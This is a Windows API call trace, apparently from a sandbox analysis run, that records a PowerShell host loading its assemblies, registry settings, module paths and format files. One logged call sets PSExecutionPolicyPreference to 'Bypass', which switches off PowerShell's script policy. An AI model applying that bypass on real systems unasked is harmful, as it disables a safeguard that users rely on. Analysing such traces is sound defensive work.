	[0118.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0118.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0118.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0118.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0118.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.682] GetConsoleWindow () returned 0xa022e
	[0136.701] SetEnvironmentVariableW (lpName="PSExecutionPolicyPreference", lpValue="Bypass") returned 1
	[0136.733] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c8
	[0137.033] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0137.033] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0137.033] CoTaskMemFree (pv=0x221730) 
	[0137.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.738] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0141.738] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0141.738] CoTaskMemFree (pv=0x221730) 
	[0141.739] CoTaskMemAlloc (cb=0xcc) returned 0x22e0a0
	[0141.739] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x22e0a0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.739] CoTaskMemFree (pv=0x22e0a0) 
	[0141.740] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dae8 | out: phkResult=0x12dae8*=0x1d0) returned 0x0
	[0141.740] RegQueryValueExW (in: hKey=0x1d0, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12da6c, lpData=0x0, lpcbData=0x12da68*=0x0 | out: lpType=0x12da6c*=0x2, lpData=0x0, lpcbData=0x12da68*=0x6c) returned 0x0
	[0141.740] CoTaskMemAlloc (cb=0x70) returned 0x227910
	[0141.740] RegQueryValueExW (in: hKey=0x1d0, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12da3c, lpData=0x227910, lpcbData=0x12da38*=0x6c | out: lpType=0x12da3c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x12da38*=0x6c) returned 0x0
	[0141.740] CoTaskMemFree (pv=0x227910) 
	[0141.740] CoTaskMemAlloc (cb=0xcc) returned 0x22e0a0
	[0141.740] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x22e0a0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0141.740] CoTaskMemFree (pv=0x22e0a0) 
	[0141.740] CoTaskMemAlloc (cb=0xcc) returned 0x22e0a0
	[0141.740] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x22e0a0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.740] CoTaskMemFree (pv=0x22e0a0) 
	[0141.743] RegCloseKey (hKey=0x1d0) returned 0x0
	[0141.743] CoTaskMemAlloc (cb=0xcc) returned 0x22e0a0
	[0141.743] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x22e0a0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.743] CoTaskMemFree (pv=0x22e0a0) 
	[0141.744] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dae8 | out: phkResult=0x12dae8*=0x1d0) returned 0x0
	[0141.744] RegQueryValueExW (in: hKey=0x1d0, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12da6c, lpData=0x0, lpcbData=0x12da68*=0x0 | out: lpType=0x12da6c*=0x0, lpData=0x0, lpcbData=0x12da68*=0x0) returned 0x2
	[0141.744] RegCloseKey (hKey=0x1d0) returned 0x0
	[0145.706] CoTaskMemAlloc (cb=0x20c) returned 0x1b8b8060
	[0145.707] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8b8060 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0146.815] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0146.816] GetFileType (hFile=0x324) returned 0x1
	[0146.816] SetErrorMode (uMode=0x1) returned 0x1
	[0146.816] GetFileType (hFile=0x324) returned 0x1
	[0146.820] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9458, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2ec9458*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.822] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9458, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2ec9458*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.823] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9458, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2ec9458*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.823] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9458, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2ec9458*, lpNumberOfBytesRead=0x12d6e8*=0xcf3, lpOverlapped=0x0) returned 1
	[0146.823] ReadFile (in: hFile=0x324, lpBuffer=0x2ec88b3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2ec88b3*, lpNumberOfBytesRead=0x12d6e8*=0x0, lpOverlapped=0x0) returned 1
	[0146.823] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9458, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2ec9458*, lpNumberOfBytesRead=0x12d6e8*=0x0, lpOverlapped=0x0) returned 1
	[0146.825] CloseHandle (hObject=0x324) returned 1
	[0148.306] GetSystemInfo (in: lpSystemInfo=0x12c380 | out: lpSystemInfo=0x12c380*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0148.307] VirtualQuery (in: lpAddress=0x12c430, lpBuffer=0x12d2f0, dwLength=0x30 | out: lpBuffer=0x12d2f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0154.433] VirtualQuery (in: lpAddress=0x12c430, lpBuffer=0x12d2f0, dwLength=0x30 | out: lpBuffer=0x12d2f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.601] VirtualQuery (in: lpAddress=0x12c430, lpBuffer=0x12d2f0, dwLength=0x30 | out: lpBuffer=0x12d2f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.602] VirtualQuery (in: lpAddress=0x12c430, lpBuffer=0x12d2f0, dwLength=0x30 | out: lpBuffer=0x12d2f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.603] VirtualQuery (in: lpAddress=0x12c430, lpBuffer=0x12d2f0, dwLength=0x30 | out: lpBuffer=0x12d2f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.604] VirtualQuery (in: lpAddress=0x12c430, lpBuffer=0x12d2f0, dwLength=0x30 | out: lpBuffer=0x12d2f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.605] VirtualQuery (in: lpAddress=0x12c430, lpBuffer=0x12d2f0, dwLength=0x30 | out: lpBuffer=0x12d2f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.605] VirtualQuery (in: lpAddress=0x12c430, lpBuffer=0x12d2f0, dwLength=0x30 | out: lpBuffer=0x12d2f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.608] VirtualQuery (in: lpAddress=0x12c430, lpBuffer=0x12d2f0, dwLength=0x30 | out: lpBuffer=0x12d2f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.107] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0159.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.107] CoTaskMemFree (pv=0x221730) 
	[0159.797] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d8e8 | out: phkResult=0x12d8e8*=0x308) returned 0x0
	[0159.797] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x12d8fc, lpData=0x0, lpcbData=0x12d8f8*=0x0 | out: lpType=0x12d8fc*=0x1, lpData=0x0, lpcbData=0x12d8f8*=0x74) returned 0x0
	[0159.797] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x12d86c, lpData=0x0, lpcbData=0x12d868*=0x0 | out: lpType=0x12d86c*=0x1, lpData=0x0, lpcbData=0x12d868*=0x74) returned 0x0
	[0159.797] CoTaskMemAlloc (cb=0x78) returned 0x227910
	[0159.797] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x12d83c, lpData=0x227910, lpcbData=0x12d838*=0x74 | out: lpType=0x12d83c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d838*=0x74) returned 0x0
	[0160.138] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0160.138] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.138] CoTaskMemFree (pv=0x221730) 
	[0160.150] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0160.150] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.150] CoTaskMemFree (pv=0x221730) 
	[0160.151] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0160.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.151] CoTaskMemFree (pv=0x221730) 
	[0160.153] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0160.153] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.153] CoTaskMemFree (pv=0x221730) 
	[0160.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.154] SetErrorMode (uMode=0x1) returned 0x1
	[0160.154] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0160.183] GetFileType (hFile=0x30c) returned 0x1
	[0160.183] SetErrorMode (uMode=0x1) returned 0x1
	[0160.183] GetFileType (hFile=0x30c) returned 0x1
	[0160.184] ReadFile (in: hFile=0x30c, lpBuffer=0x343f478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x343f478*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0160.192] ReadFile (in: hFile=0x30c, lpBuffer=0x343f478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x343f478*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0160.194] ReadFile (in: hFile=0x30c, lpBuffer=0x343f478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x343f478*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0160.201] ReadFile (in: hFile=0x30c, lpBuffer=0x343f478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x343f478*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0160.203] ReadFile (in: hFile=0x30c, lpBuffer=0x343f478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x343f478*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0160.206] ReadFile (in: hFile=0x30c, lpBuffer=0x343f478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x343f478*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0160.208] ReadFile (in: hFile=0x30c, lpBuffer=0x343f478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x343f478*, lpNumberOfBytesRead=0x12d458*=0x9e2, lpOverlapped=0x0) returned 1
	[0160.212] ReadFile (in: hFile=0x30c, lpBuffer=0x343e9c2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x343e9c2*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0160.214] ReadFile (in: hFile=0x30c, lpBuffer=0x343f478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x343f478*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0160.217] CloseHandle (hObject=0x30c) returned 1
	[0160.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.407] SetErrorMode (uMode=0x1) returned 0x1
	[0160.408] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0160.695] SetErrorMode (uMode=0x1) returned 0x1
	[0160.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.695] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4e8 | out: phkResult=0x12d4e8*=0x30c) returned 0x0
	[0160.695] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d46c, lpData=0x0, lpcbData=0x12d468*=0x0 | out: lpType=0x12d46c*=0x1, lpData=0x0, lpcbData=0x12d468*=0x56) returned 0x0
	[0160.696] CoTaskMemAlloc (cb=0x5a) returned 0x211a50
	[0160.696] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d43c, lpData=0x211a50, lpcbData=0x12d438*=0x56 | out: lpType=0x12d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d438*=0x56) returned 0x0
	[0160.696] CoTaskMemFree (pv=0x211a50) 
	[0160.696] RegCloseKey (hKey=0x30c) returned 0x0
	[0160.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
